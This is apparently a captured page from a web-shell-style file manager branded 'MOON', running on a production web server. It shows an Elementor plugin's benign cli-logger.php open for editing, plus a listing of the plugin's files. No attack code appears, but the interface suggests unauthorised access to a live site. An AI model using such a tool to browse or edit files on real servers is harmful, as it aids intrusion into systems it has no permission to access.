┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/gshub/wp-content/plugins/elementor/modules/wp-cli
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: cli-logger.php
<?php namespace Elementor\Modules\WpCli; use Elementor\Core\Logger\Loggers\Db; use Elementor\Core\Logger\Items\Log_Item_Interface; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Cli_Logger extends Db { public function save_log( Log_Item_Interface $item ) { $message = $item->format( 'raw' ); switch ( $item->type ) { case self::LEVEL_WARNING: \WP_CLI::warning( $message ); break; case self::LEVEL_ERROR: \WP_CLI::error( $message, false ); break; default: \WP_CLI::log( $message ); break; } parent::save_log( $item ); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 cli-logger.php
PHP
599 B
2026-05-05 06:08
EDIT
📄 command.php
PHP
4.6 KB
2026-05-05 06:08
EDIT
📄 library.php
PHP
6.8 KB
2026-05-05 06:08
EDIT
📄 module.php
PHP
1.3 KB
2026-05-05 06:08
EDIT
📄 update.php
PHP
2.5 KB
2026-05-05 06:08
EDIT